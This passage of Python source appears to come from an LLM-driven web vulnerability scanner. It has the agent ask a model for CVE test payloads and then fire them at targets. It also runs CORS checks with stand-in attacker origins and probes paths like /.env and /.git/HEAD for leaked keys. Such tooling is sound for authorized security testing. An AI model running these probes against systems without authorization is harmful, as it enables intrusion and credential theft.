"true").lower() != "false": try: rag_backend = os.getenv("RAG_BACKEND", "auto") self.rag_engine = RAGEngine(data_dir="data", backend=rag_backend) self.few_shot_selector = FewShotSelector(rag_engine=self.rag_engine) self.reasoning_memory = ReasoningMemory() except Exception as e: logger.warning(f"RAG init failed: {e}") # External methodology loader (injects into all LLM calls) self.methodology_index = None _meth_file = methodology_file or os.getenv("METHODOLOGY_FILE") if _meth_file and os.path.exists(_meth_file): try: from backend.core.methodology_loader import MethodologyLoader _loader = MethodologyLoader() self.methodology_index = _loader.load_from_file(_meth_file) if self.loaded_custom_prompts: db_idx = _loader.load_from_db_prompts(self.loaded_custom_prompts) self.methodology_index = _loader.merge_indices( self.methodology_index, db_idx) except Exception as e: logger.warning(f"Methodology loader init failed: {e}") elif self.loaded_custom_prompts: try: from backend.core.methodology_loader import MethodologyLoader _loader = MethodologyLoader() self.methodology_index = _loader.load_from_db_prompts( self.loaded_custom_prompts) except Exception: pass # Pass methodology index to validation judge if self.methodology_index: self.validation_judge.methodology_index = self.methodology_index # Autonomy modules (lazy-init after session in __aenter__) self.request_engine = None self.waf_detector = None self.strategy = None self.chain_engine = ChainEngine(llm=self.llm) self.auth_manager = None self._waf_result = None # Phase 1: Token budget + Reasoning engine self.token_budget = None if HAS_TOKEN_BUDGET and os.getenv("TOKEN_BUDGET"): self.token_budget = TokenBudget( total_budget=int(os.getenv("TOKEN_BUDGET", "100000")) ) self.reasoning_engine = None if HAS_REASONING and os.getenv("ENABLE_REASONING", "true").lower() == "true": self.reasoning_engine = ReasoningEngine(self.llm, self.token_budget) self.task_manager = None if HAS_AGENT_TASKS: self.task_manager = AgentTaskManager() # Phase 2: Endpoint classifier, CVE hunter, Deep recon, Banner analyzer self.endpoint_classifier = EndpointClassifier() if HAS_ENDPOINT_CLASSIFIER else None self.cve_hunter = None # Lazy-init after session self.deep_recon = None # Lazy-init after session self.banner_analyzer = BannerAnalyzer() if HAS_BANNER_ANALYZER else None # Phase 3: Payload mutator, Param analyzer, XSS validator self.payload_mutator = PayloadMutator() if HAS_PAYLOAD_MUTATOR else None self.param_analyzer = ParameterAnalyzer() if HAS_PARAM_ANALYZER else None self.xss_validator = XSSValidator() if HAS_XSS_VALIDATOR else None # Phase 3.5: Request repeater, Site analyzer self.request_repeater = RequestRepeater() if HAS_REQUEST_REPEATER else None self.site_analyzer = SiteAnalyzer() if HAS_SITE_ANALYZER else None # Phase 4: Exploit generator, PoC validator self.exploit_generator = ExploitGenerator() if HAS_EXPLOIT_GENERATOR else None self.poc_validator_engine = None # Lazy-init after session # Phase 5: Multi-agent orchestrator (optional replacement for 3-stream) self._orchestrator = None # Lazy-init after session # Phase 5.5: MD-based agent orchestrator (post-recon dispatch) self._md_orchestrator = None # Lazy-init after session # Researcher AI (0-day discovery with Kali sandbox, opt-in) self._researcher = None # Lazy-init after session # Phase 6: Per-vuln-type agent orchestrator (opt-in via ENABLE_VULN_AGENTS) self._vuln_orchestrator = None # Phase 7: Checkpoint persistence self._checkpoint_manager = ( CheckpointManager(self.scan_id) if HAS_CHECKPOINT and self.scan_id else None ) self._last_progress = 0 self._last_phase = "" # Data storage self.recon = ReconData() self.memory = AgentMemory() self._site_architecture = None # SiteAnalyzer architecture analysis result self.custom_prompts: List[str] = [] self.tool_executions: List[Dict] = [] self.rejected_findings: List[Finding] = [] self._sandbox = None # Lazy-init sandbox reference for tool runner self.container_status: Optional[Dict] = None # Container telemetry @property def findings(self) -> List[Finding]: """Backward-compatible access to confirmed findings via memory""" return self.memory.confirmed_findings def cancel(self): """Cancel the agent execution""" self._cancelled = True self._paused = False # Unpause so cancel is immediate if self._vuln_orchestrator: self._vuln_orchestrator.cancel() def is_cancelled(self) -> bool: """Check if agent was cancelled""" return self._cancelled def pause(self): """Pause the agent execution""" self._paused = True def resume(self): """Resume the agent execution""" self._paused = False def is_paused(self) -> bool: """Check if agent is paused""" return self._paused async def _wait_if_paused(self): """Block while paused, checking for cancel every second""" while self._paused and not self._cancelled: await asyncio.sleep(1) def _save_checkpoint(self): """Save current state for crash-resilient resume.""" if not self._checkpoint_manager: return try: state = { "target": self.target, "mode": self.mode, "scan_type": self.scan_type, "progress": self._last_progress, "phase": self._last_phase, "recon_data": { "endpoints": [ {"url": e.url, "method": e.method, "params": e.params} for e in self.recon.endpoints[:50] ], "technologies": list(self.recon.technologies), "forms": self.recon.forms[:20] if hasattr(self.recon, 'forms') else [], }, "findings": [ { "title": f.title, "vuln_type": f.vulnerability_type, "severity": f.severity, "endpoint": f.endpoint, "confidence_score": getattr(f, 'confidence_score', 0), } for f in self.findings ], "rejected_count": len(self.rejected_findings), "junior_tested_types": list(getattr(self, '_junior_tested_types', set())), } self._checkpoint_manager.save(state) except Exception: pass # Never block scan flow async def _vuln_agent_ws_broadcast(self, message: Dict): """Broadcast vuln agent status updates via WebSocket.""" if self.scan_id: try: from backend.api.websocket import manager as ws_manager await ws_manager.send_to_scan(self.scan_id, message) except Exception: pass def _build_test_targets(self) -> List[Dict]: """Build test target list from recon data (shared by sequential and orchestrated paths).""" test_targets = [] # Endpoints with parameters for endpoint in self.recon.endpoints[:20]: url = _get_endpoint_url(endpoint) parsed = urlparse(url) base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" if parsed.query: params = list(parse_qs(parsed.query).keys()) test_targets.append({ "url": base_url, "method": "GET", "params": params, "original_url": url, }) elif url in self.recon.parameters: test_targets.append({ "url": url, "method": "GET", "params": self.recon.parameters[url], }) # Forms for form in self.recon.forms[:10]: form_defaults = {} for detail in form.get('input_details', []): name = detail.get('name', '') if name and detail.get('value'): form_defaults[name] = detail['value'] test_targets.append({ "url": form['action'], "method": form['method'], "params": form.get('inputs', []), "form_defaults": form_defaults, }) # Fallback: common params if not test_targets: for endpoint in self.recon.endpoints[:5]: test_targets.append({ "url": _get_endpoint_url(endpoint), "method": "GET", "params": ["id", "q", "search", "page", "file", "url", "cat", "artist", "item"], }) # Always include main target test_targets.append({ "url": self.target, "method": "GET", "params": ["id", "q", "search", "page", "file", "url", "path", "redirect", "cat", "item"], }) return test_targets # Phase ordering for skip-to-phase support AGENT_PHASES = ["recon", "analysis", "testing", "enhancement", "completed"] def skip_to_phase(self, target_phase: str) -> bool: """Signal the agent to skip to a given phase""" if target_phase not in self.AGENT_PHASES: return False self._skip_to_phase = target_phase return True def _check_skip(self, current_phase: str) -> Optional[str]: """Check if we should skip to a phase ahead of current_phase""" target = self._skip_to_phase if not target: return None try: cur_idx = self.AGENT_PHASES.index(current_phase) tgt_idx = self.AGENT_PHASES.index(target) except ValueError: return None if tgt_idx > cur_idx: self._skip_to_phase = None return target self._skip_to_phase = None return None def _map_vuln_type(self, vuln_type: str) -> str: """Map agent vuln type name to VulnEngine registry key""" return self.VULN_TYPE_MAP.get(vuln_type, vuln_type) def _get_payloads(self, vuln_type: str) -> List[str]: """Get payloads from VulnEngine PayloadGenerator""" mapped = self._map_vuln_type(vuln_type) payloads = self.payload_generator.payload_libraries.get(mapped, []) if not payloads: # Try original name payloads = self.payload_generator.payload_libraries.get(vuln_type, []) return payloads @staticmethod def _load_knowledge_base() -> Dict: """Load vulnerability knowledge base JSON at startup""" kb_path = Path(__file__).parent.parent.parent / "data" / "vuln_knowledge_base.json" try: with open(kb_path, "r") as f: return json.load(f) except Exception: return {} async def add_custom_prompt(self, prompt: str): """Add a custom prompt to be processed""" self.custom_prompts.append(prompt) await self.log_llm("info", f"[USER PROMPT RECEIVED] {prompt}") # Process immediately if LLM is available if self.llm.is_available(): await self._process_custom_prompt(prompt) async def _process_custom_prompt(self, prompt: str): """Process a custom user prompt with the LLM and execute requested tests. Detects CVE references and vulnerability test requests, then ACTUALLY tests them against the target instead of just providing AI text responses. """ await self.log_llm("info", f"[AI] Processing user prompt: {prompt}") # Detect CVE references in prompt cve_match = re.search(r'CVE-\d{4}-\d{4,}', prompt, re.IGNORECASE) cve_id = cve_match.group(0).upper() if cve_match else None # Build context about available endpoints endpoints_info = [] for ep in self.recon.endpoints[:20]: endpoints_info.append(f"- {_get_endpoint_method(ep)} {_get_endpoint_url(ep)}") params_info = [] for param, values in list(self.recon.parameters.items())[:15]: params_info.append(f"- {param}: {values[:3]}") forms_info = [] for form in self.recon.forms[:10]: forms_info.append(f"- {form.get('method', 'GET')} {form.get('action', 'N/A')} fields={form.get('inputs', [])[:5]}") # Enhanced system prompt that requests actionable test plans system_prompt = f"""You are a senior penetration tester performing ACTIVE TESTING against {self.target}. The user wants you to ACTUALLY TEST for vulnerabilities, not just explain them. {'The user is asking about ' + cve_id + '. Research this CVE and generate specific test payloads.' if cve_id else ''} Current reconnaissance data: Target: {self.target} Endpoints ({len(self.recon.endpoints)} total): {chr(10).join(endpoints_info[:10]) if endpoints_info else ' None discovered yet'} Parameters ({len(self.recon.parameters)} total): {chr(10).join(params_info[:10]) if params_info else ' None discovered yet'} Forms ({len(self.recon.forms)} total): {chr(10).join(forms_info[:5]) if forms_info else ' None discovered yet'} Technologies detected: {', '.join(self.recon.technologies) if self.recon.technologies else 'None'} CRITICAL: You must respond with a TEST PLAN in JSON format. The agent will EXECUTE these tests. Available injection points: "parameter", "header", "cookie", "body", "path" Available vuln types: xss_reflected, xss_stored, sqli_error, sqli_union, sqli_blind, sqli_time, command_injection, ssti, lfi, rfi, path_traversal, ssrf, xxe, crlf_injection, header_injection, host_header_injection, open_redirect, csrf, nosql_injection, idor, cors_misconfig Respond in this JSON format: {{ "analysis": "What the user is asking and your security assessment", "action": "test_cve|test_endpoint|test_parameter|scan_for|analyze|info", "vuln_type": "primary vulnerability type to test", "injection_point": "parameter|header|cookie|body|path", "header_name": "X-Forwarded-For", "payloads": ["payload1", "payload2", "payload3"], "targets": ["specific URLs to test"], "vuln_types": ["list of vuln types if scanning for multiple"], "response": "Brief explanation shown to the user" }} For CVE testing, include at least 5 specific payloads based on the CVE's attack vector. Always set action to "test_cve" or "test_endpoint" when the user asks to test something.""" # Append anti-hallucination directives system_prompt += "\n\n" + self._get_enhanced_system_prompt("testing") try: response = await self.llm.generate(prompt, system=system_prompt) if not response: await self.log_llm("warning", "[AI] No response from LLM") return await self.log_llm("info", f"[AI] Analyzing request and building test plan...") import json try: json_match = re.search(r'\{[\s\S]*\}', response) if json_match: action_data = json.loads(json_match.group()) action = action_data.get("action", "info") targets = action_data.get("targets", []) vuln_types = action_data.get("vuln_types", []) vuln_type = action_data.get("vuln_type", "") injection_point = action_data.get("injection_point", "parameter") header_name = action_data.get("header_name", "") payloads = action_data.get("payloads", []) ai_response = action_data.get("response", response) await self.log_llm("info", f"[AI] {ai_response[:300]}") # ── CVE Testing: Actually execute tests ── if action == "test_cve": await self.log_llm("info", f"[AI] Executing CVE test plan: {vuln_type} via {injection_point}") await self._execute_cve_test( cve_id or "CVE-unknown", vuln_type, injection_point, header_name, payloads, targets ) elif action == "test_endpoint" and targets: await self.log_llm("info", f"[AI] Testing {len(targets)} endpoints...") for target_url in targets[:5]: if payloads and vuln_type: # Use AI-generated payloads with correct injection await self._execute_targeted_test( target_url, vuln_type, injection_point, header_name, payloads ) else: await self._test_custom_endpoint(target_url, vuln_types or ["xss_reflected", "sqli_error"]) elif action == "test_parameter" and targets: await self.log_llm("info", f"[AI] Testing parameters: {targets}") await self._test_custom_parameters(targets, vuln_types or ["xss_reflected", "sqli_error"]) elif action == "scan_for" and vuln_types: await self.log_llm("info", f"[AI] Scanning for: {vuln_types}") for vtype in vuln_types[:5]: await self._scan_for_vuln_type(vtype) elif action == "analyze": await self.log_llm("info", f"[AI] Analysis complete") else: await self.log_llm("info", f"[AI] Response provided - no active test needed") else: await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except json.JSONDecodeError: await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except Exception as e: await self.log_llm("error", f"[AI] Error processing prompt: {str(e)}") async def _test_custom_endpoint(self, url: str, vuln_types: List[str]): """Test a specific endpoint for vulnerabilities""" if not self.session: return await self.log("info", f" Testing endpoint: {url}") try: # Parse URL to find parameters parsed = urlparse(url) params = parse_qs(parsed.query) if not params: # Try adding common parameters params = {"id": ["1"], "q": ["test"]} for param_name in list(params.keys())[:3]: for vtype in vuln_types[:2]: payloads = self._get_payloads(vtype)[:2] for payload in payloads: await self._test_single_param(url, param_name, payload, vtype) except Exception as e: await self.log("debug", f" Error testing {url}: {e}") async def _test_custom_parameters(self, param_names: List[str], vuln_types: List[str]): """Test specific parameters across known endpoints""" endpoints_with_params = [ ep for ep in self.recon.endpoints if any(p in str(ep) for p in param_names) ] if not endpoints_with_params: # Use all endpoints that have parameters endpoints_with_params = self.recon.endpoints[:10] for ep in endpoints_with_params[:5]: url = _get_endpoint_url(ep) for param in param_names[:3]: for vtype in vuln_types[:2]: payloads = self._get_payloads(vtype)[:2] for payload in payloads: await self._test_single_param(url, param, payload, vtype) async def _execute_cve_test(self, cve_id: str, vuln_type: str, injection_point: str, header_name: str, payloads: List[str], targets: List[str]): """Execute actual CVE testing with AI-generated payloads against the target.""" await self.log("warning", f" [CVE TEST] Testing {cve_id} ({vuln_type}) via {injection_point}") # Build test targets: use AI-suggested URLs or fall back to discovered endpoints test_urls = targets[:5] if targets else [] if not test_urls: test_urls = [self.target] for ep in self.recon.endpoints[:10]: ep_url = _get_endpoint_url(ep) if ep_url and ep_url not in test_urls: test_urls.append(ep_url) # Also use payloads from the PayloadGenerator as fallback all_payloads = list(payloads[:10]) registry_payloads = self._get_payloads(vuln_type)[:5] for rp in registry_payloads: if rp not in all_payloads: all_payloads.append(rp) findings_count = 0 for test_url in test_urls[:5]: if self.is_cancelled(): return await self.log("info", f" [CVE TEST] Testing {test_url[:60]}...") for payload in all_payloads[:10]: if self.is_cancelled(): return # Use correct injection method if injection_point == "header": test_resp = await self._make_request_with_injection( test_url, "GET", payload, injection_point="header", header_name=header_name or "X-Forwarded-For" ) param_name = header_name or "X-Forwarded-For" elif injection_point in ("body", "cookie", "path"): parsed = urlparse(test_url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["data"] test_resp = await self._make_request_with_injection( test_url, "POST" if injection_point == "body" else "GET", payload, injection_point=injection_point, param_name=params[0] if params else "data" ) param_name = params[0] if params else "data" else: # parameter parsed = urlparse(test_url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["id", "q"] param_name = params[0] if params else "id" test_resp = await self._make_request_with_injection( test_url, "GET", payload, injection_point="parameter", param_name=param_name ) if not test_resp: continue # Verify the response is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, None ) if is_vuln: evidence = f"[{cve_id}] {evidence}" finding = self._create_finding( vuln_type, test_url, param_name, payload, evidence, test_resp, ai_confirmed=True ) finding.title = f"{cve_id} - {finding.title}" finding.references.append(f"https://nvd.nist.gov/vuln/detail/{cve_id}") await self._add_finding(finding) findings_count += 1 await self.log("warning", f" [CVE TEST] {cve_id} CONFIRMED at {test_url[:50]}") break # One finding per URL is enough if findings_count == 0: await self.log("info", f" [CVE TEST] {cve_id} not confirmed after testing {len(test_urls)} targets with {len(all_payloads)} payloads") else: await self.log("warning", f" [CVE TEST] {cve_id} found {findings_count} vulnerable endpoint(s)") async def _execute_targeted_test(self, url: str, vuln_type: str, injection_point: str, header_name: str, payloads: List[str]): """Execute targeted vulnerability tests with specific payloads and injection point.""" await self.log("info", f" [TARGETED] Testing {vuln_type} via {injection_point} at {url[:60]}") for payload in payloads[:10]: if self.is_cancelled(): return parsed = urlparse(url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["id"] param_name = params[0] if params else "id" if injection_point == "header": param_name = header_name or "X-Forwarded-For" test_resp = await self._make_request_with_injection( url, "GET", payload, injection_point=injection_point, param_name=param_name, header_name=header_name ) if not test_resp: continue is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, None ) if is_vuln: finding = self._create_finding( vuln_type, url, param_name, payload, evidence, test_resp, ai_confirmed=True ) await self._add_finding(finding) await self.log("warning", f" [TARGETED] {vuln_type} confirmed at {url[:50]}") return await self.log("info", f" [TARGETED] {vuln_type} not confirmed at {url[:50]}") async def _scan_for_vuln_type(self, vuln_type: str): """Scan all endpoints for a specific vulnerability type""" await self.log("info", f" Scanning for {vuln_type.upper()} vulnerabilities...") vuln_lower = vuln_type.lower() # Handle header-based vulnerabilities (no payloads needed) if vuln_lower in ["clickjacking", "x-frame-options", "csp", "hsts", "headers", "security headers", "missing headers"]: await self._test_security_headers(vuln_lower) return # Handle CORS testing if vuln_lower in ["cors", "cross-origin"]: await self._test_cors() return # Handle information disclosure if vuln_lower in ["info", "information disclosure", "version", "technology"]: await self._test_information_disclosure() return # Standard payload-based testing payloads = self._get_payloads(vuln_type)[:3] if not payloads: # Try AI-based testing for unknown vuln types await self._ai_test_vulnerability(vuln_type) return for ep in self.recon.endpoints[:10]: url = _get_endpoint_url(ep) for param in list(self.recon.parameters.keys())[:5]: for payload in payloads: await self._test_single_param(url, param, payload, vuln_type) async def _test_security_headers(self, vuln_type: str): """Test for security header vulnerabilities like clickjacking""" await self.log("info", f" Testing security headers...") # Test main target and key pages test_urls = [self.target] for ep in self.recon.endpoints[:5]: url = _get_endpoint_url(ep) if isinstance(ep, dict) else ep if url and url not in test_urls: test_urls.append(url) for url in test_urls: if self.is_cancelled(): return try: async with self.session.get(url, allow_redirects=True, timeout=self._get_request_timeout()) as resp: headers = dict(resp.headers) headers_lower = {k.lower(): v for k, v in headers.items()} findings = [] # Check X-Frame-Options (Clickjacking) x_frame = headers_lower.get("x-frame-options", "") csp = headers_lower.get("content-security-policy", "") if not x_frame and "frame-ancestors" not in csp.lower(): findings.append({ "type": "clickjacking", "title": "Missing Clickjacking Protection", "severity": "medium", "description": "The page lacks X-Frame-Options header and CSP frame-ancestors directive, making it vulnerable to clickjacking attacks.", "evidence": f"X-Frame-Options: Not set\nCSP: {csp[:100] if csp else 'Not set'}", "remediation": "Add 'X-Frame-Options: DENY' or 'X-Frame-Options: SAMEORIGIN' header, or use 'frame-ancestors' in CSP." }) # Check HSTS hsts = headers_lower.get("strict-transport-security", "") if not hsts and url.startswith("https"): findings.append({ "type": "missing_hsts", "title": "Missing HSTS Header", "severity": "low", "description": "HTTPS site without Strict-Transport-Security header, vulnerable to protocol downgrade attacks.", "evidence": "Strict-Transport-Security: Not set", "remediation": "Add 'Strict-Transport-Security: max-age=31536000; includeSubDomains' header." }) # Check X-Content-Type-Options if "x-content-type-options" not in headers_lower: findings.append({ "type": "missing_xcto", "title": "Missing X-Content-Type-Options Header", "severity": "low", "description": "Missing nosniff header allows MIME-sniffing attacks.", "evidence": "X-Content-Type-Options: Not set", "remediation": "Add 'X-Content-Type-Options: nosniff' header." }) # Check CSP if not csp: findings.append({ "type": "missing_csp", "title": "Missing Content-Security-Policy Header", "severity": "low", "description": "No Content-Security-Policy header, increasing XSS risk.", "evidence": "Content-Security-Policy: Not set", "remediation": "Implement a restrictive Content-Security-Policy." }) # Create findings (non-AI: detected by header inspection) # Domain-scoped dedup: only 1 finding per domain for header issues for f in findings: mapped = self._map_vuln_type(f["type"]) vt = f["type"] # Check if we already have this finding for this domain if self.memory.has_finding_for(vt, url): # Append URL to existing finding's affected_urls for ef in self.memory.confirmed_findings: if ef.vulnerability_type == vt: if url not in ef.affected_urls: ef.affected_urls.append(url) break continue finding = Finding( id=hashlib.md5(f"{vt}{url}".encode()).hexdigest()[:8], title=self.vuln_registry.get_title(mapped) or f["title"], severity=self.vuln_registry.get_severity(mapped) or f["severity"], vulnerability_type=vt, cvss_score=self._get_cvss_score(vt), cvss_vector=self._get_cvss_vector(vt), cwe_id=self.vuln_registry.get_cwe_id(mapped) or "CWE-693", description=self.vuln_registry.get_description(mapped) or f["description"], affected_endpoint=url, evidence=f["evidence"], remediation=self.vuln_registry.get_remediation(mapped) or f["remediation"], affected_urls=[url], ai_verified=False # Detected by inspection, not AI ) await self._add_finding(finding) except Exception as e: await self.log("debug", f" Header test error: {e}") async def _test_cors(self): """Test for CORS misconfigurations""" await self.log("info", f" Testing CORS configuration...") test_origins = [ "https://evil.com", "https://attacker.com", "null" ] for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]: if not url: continue for origin in test_origins: try: headers = {"Origin": origin} async with self.session.get(url, headers=headers) as resp: acao = resp.headers.get("Access-Control-Allow-Origin", "") acac = resp.headers.get("Access-Control-Allow-Credentials", "") if acao == origin or acao == "*": # Domain-scoped dedup for CORS if self.memory.has_finding_for("cors_misconfig", url): for ef in self.memory.confirmed_findings: if ef.vulnerability_type == "cors_misconfig": if url not in ef.affected_urls: ef.affected_urls.append(url) break break severity = "high" if acac.lower() == "true" else "medium" finding = Finding( id=hashlib.md5(f"cors{url}{origin}".encode()).hexdigest()[:8], title=self.vuln_registry.get_title("cors_misconfig") or f"CORS Misconfiguration - {origin}", severity=severity, vulnerability_type="cors_misconfig", cvss_score=self._get_cvss_score("cors_misconfig"), cvss_vector=self._get_cvss_vector("cors_misconfig"), cwe_id=self.vuln_registry.get_cwe_id("cors_misconfig") or "CWE-942", description=self.vuln_registry.get_description("cors_misconfig") or f"The server reflects the Origin header '{origin}' in Access-Control-Allow-Origin.", affected_endpoint=url, evidence=f"Origin: {origin}\nAccess-Control-Allow-Origin: {acao}\nAccess-Control-Allow-Credentials: {acac}", remediation=self.vuln_registry.get_remediation("cors_misconfig") or "Configure CORS to only allow trusted origins.", affected_urls=[url], ai_verified=False # Detected by inspection, not AI ) await self._add_finding(finding) await self.log("warning", f" [FOUND] CORS misconfiguration at {url[:50]}") break except: pass async def _test_information_disclosure(self): """Test for information disclosure""" await self.log("info", f" Testing for information disclosure...") for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]: if not url: continue try: async with self.session.get(url) as resp: headers = dict(resp.headers) # Server header disclosure (domain-scoped: sensitive_data_exposure) server = headers.get("Server", "") if server and any(v in server.lower() for v in ["apache/", "nginx/", "iis/", "tomcat/"]): vt = "sensitive_data_exposure" dedup_key = f"server_version" if self.memory.has_finding_for(vt, url, dedup_key): for ef in self.memory.confirmed_findings: if ef.vulnerability_type == vt and ef.parameter == dedup_key: if url not in ef.affected_urls: ef.affected_urls.append(url) break else: finding = Finding( id=hashlib.md5(f"server{url}".encode()).hexdigest()[:8], title="Server Version Disclosure", severity="info", vulnerability_type=vt, cvss_score=0.0, cwe_id="CWE-200", description=f"The server discloses its version: {server}", affected_endpoint=url, parameter=dedup_key, evidence=f"Server: {server}", remediation="Remove or obfuscate the Server header to prevent version disclosure.", affected_urls=[url], ai_verified=False # Detected by inspection ) await self._add_finding(finding) # X-Powered-By disclosure (domain-scoped: sensitive_data_exposure) powered_by = headers.get("X-Powered-By", "") if powered_by: vt = "sensitive_data_exposure" dedup_key = f"x_powered_by" if self.memory.has_finding_for(vt, url, dedup_key): for ef in self.memory.confirmed_findings: if ef.vulnerability_type == vt and ef.parameter == dedup_key: if url not in ef.affected_urls: ef.affected_urls.append(url) break else: finding = Finding( id=hashlib.md5(f"poweredby{url}".encode()).hexdigest()[:8], title="Technology Version Disclosure", severity="info", vulnerability_type=vt, cvss_score=0.0, cwe_id="CWE-200", description=f"The X-Powered-By header reveals technology: {powered_by}", affected_endpoint=url, parameter=dedup_key, evidence=f"X-Powered-By: {powered_by}", remediation="Remove the X-Powered-By header.", affected_urls=[url], ai_verified=False # Detected by inspection ) await self._add_finding(finding) except: pass async def _test_misconfigurations(self): """Test for directory listing, debug mode, admin panels, API docs""" await self.log("info", " Testing for misconfigurations...") # Common paths to check check_paths = { "directory_listing": ["/", "/assets/", "/images/", "/uploads/", "/static/", "/backup/"], "debug_mode": ["/debug", "/debug/", "/_debug", "/trace", "/elmah.axd", "/phpinfo.php"], "exposed_admin_panel": ["/admin", "/admin/", "/administrator", "/wp-admin", "/manager", "/dashboard", "/cpanel"], "exposed_api_docs": ["/swagger", "/swagger-ui", "/api-docs", "/docs", "/redoc", "/graphql", "/openapi.json"], } parsed_target = urlparse(self.target) base = f"{parsed_target.scheme}://{parsed_target.netloc}" for vuln_type, paths in check_paths.items(): await self._wait_if_paused() if self.is_cancelled(): return for path in paths: if self.is_cancelled(): return url = base + path try: async with self.session.get(url, allow_redirects=False, timeout=self._get_request_timeout()) as resp: status = resp.status body = await resp.text() headers = dict(resp.headers) detected = False evidence = "" if vuln_type == "directory_listing" and status == 200: if "Index of" in body or "Directory listing" in body or "
" in body:
detected = True
evidence = f"Directory listing enabled at {path}"
elif vuln_type == "debug_mode" and status == 200:
debug_markers = ["stack trace", "traceback", "debug toolbar",
"phpinfo()", "DJANGO_SETTINGS_MODULE", "laravel_debugbar"]
if any(m.lower() in body.lower() for m in debug_markers):
detected = True
evidence = f"Debug mode/info exposed at {path}"
elif vuln_type == "exposed_admin_panel" and status == 200:
admin_markers = ["login", "admin", "password", "sign in", "username"]
if sum(1 for m in admin_markers if m.lower() in body.lower()) >= 2:
detected = True
evidence = f"Admin panel found at {path}"
elif vuln_type == "exposed_api_docs" and status == 200:
doc_markers = ["swagger", "openapi", "api documentation", "graphql",
"query {", "mutation {", "paths", "components"]
if any(m.lower() in body.lower() for m in doc_markers):
detected = True
evidence = f"API documentation exposed at {path}"
if detected:
if not self.memory.has_finding_for(vuln_type, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vuln_type, {})
finding = Finding(
id=hashlib.md5(f"{vuln_type}{url}".encode()).hexdigest()[:8],
title=info.get("title", vuln_type.replace("_", " ").title()),
severity=info.get("severity", "low"),
vulnerability_type=vuln_type,
cvss_score=self._get_cvss_score(vuln_type),
cvss_vector=self._get_cvss_vector(vuln_type),
cwe_id=info.get("cwe_id", "CWE-16"),
description=info.get("description", evidence),
affected_endpoint=url,
evidence=evidence,
remediation=info.get("remediation", "Restrict access to this resource."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] {vuln_type} at {path}")
break # One finding per vuln type is enough
except:
pass
async def _test_data_exposure(self):
"""Test for source code disclosure, backup files, API key exposure"""
await self.log("info", " Testing for data exposure...")
parsed_target = urlparse(self.target)
base = f"{parsed_target.scheme}://{parsed_target.netloc}"
exposure_checks = {
"source_code_disclosure": {
"paths": ["/.git/HEAD", "/.svn/entries", "/.env", "/wp-config.php.bak",
"/.htaccess", "/web.config", "/config.php~"],
"markers": ["ref:", "svn", "DB_PASSWORD", "APP_KEY", "SECRET_KEY"],
},
"backup_file_exposure": {
"paths": ["/backup.zip", "/backup.sql", "/db.sql", "/site.tar.gz",
"/backup.tar", "/.sql", "/dump.sql"],
"markers": ["PK\x03\x04", "CREATE TABLE", "INSERT INTO", "mysqldump"],
},
"api_key_exposure": {
"paths": ["/config.js", "/env.js", "/settings.json", "/.env.local",
"/api/config", "/static/js/app.*.js"],
"markers": ["api_key", "apikey", "api-key", "secret_key", "access_token",
"AKIA", "sk-", "pk_live_", "ghp_", "glpat-"],
},
}
for vuln_type, config in exposure_checks.items():
await self._wait_if_paused()
if self.is_cancelled():
return
for path in config["paths"]:
if self.is_cancelled():
return
url = base + path
try:
async with self.session.get(url, allow_redirects=False, timeout=self._get_request_timeout()) as resp:
if resp.status == 200:
body = await resp.text()
body_bytes = body[:1000]
if any(m in body_bytes for m in config["markers"]):
if not self.memory.has_finding_for(vuln_type, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vuln_type, {})
finding = Finding(
id=hashlib.md5(f"{vuln_type}{url}".encode()).hexdigest()[:8],
title=info.get("title", vuln_type.replace("_", " ").title()),
severity=info.get("severity", "high"),
vulnerability_type=vuln_type,
cvss_score=self._get_cvss_score(vuln_type),
cvss_vector=self._get_cvss_vector(vuln_type),
cwe_id=info.get("cwe_id", "CWE-200"),
description=f"Sensitive file exposed at {path}",
affected_endpoint=url,
evidence=f"HTTP 200 at {path} with sensitive content markers",
remediation=info.get("remediation", "Remove or restrict access to this file."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] {vuln_type} at {path}")
break
except:
pass
async def _test_ssl_crypto(self):
"""Test for SSL/TLS issues and crypto weaknesses"""
await self.log("info", " Testing SSL/TLS configuration...")
parsed = urlparse(self.target)
# Check if site is HTTP-only (no HTTPS redirect)
if parsed.scheme == "http":
vt = "cleartext_transmission"
if not self.memory.has_finding_for(vt, self.target, ""):
https_url = self.target.replace("http://", "https://")
has_https = False
try:
async with self.session.get(https_url, timeout=5) as resp:
has_https = resp.status < 400
except:
pass
if not has_https:
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{self.target}".encode()).hexdigest()[:8],
title="Cleartext HTTP Transmission",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-319",
description="Application is served over HTTP without HTTPS.",
affected_endpoint=self.target,
evidence="No HTTPS endpoint available",
remediation=info.get("remediation", "Enable HTTPS with a valid TLS certificate."),
affected_urls=[self.target],
ai_verified=False
)
await self._add_finding(finding)
# Check HSTS header
try:
async with self.session.get(self.target) as resp:
headers = dict(resp.headers)
if "Strict-Transport-Security" not in headers and parsed.scheme == "https":
vt = "ssl_issues"
if not self.memory.has_finding_for(vt, self.target, "hsts"):
finding = Finding(
id=hashlib.md5(f"hsts{self.target}".encode()).hexdigest()[:8],
title="Missing HSTS Header",
severity="low",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cwe_id="CWE-523",
description="Strict-Transport-Security header not set.",
affected_endpoint=self.target,
parameter="hsts",
evidence="HSTS header missing from HTTPS response",
remediation="Add Strict-Transport-Security header with appropriate max-age.",
affected_urls=[self.target],
ai_verified=False
)
await self._add_finding(finding)
except:
pass
async def _test_graphql_introspection(self):
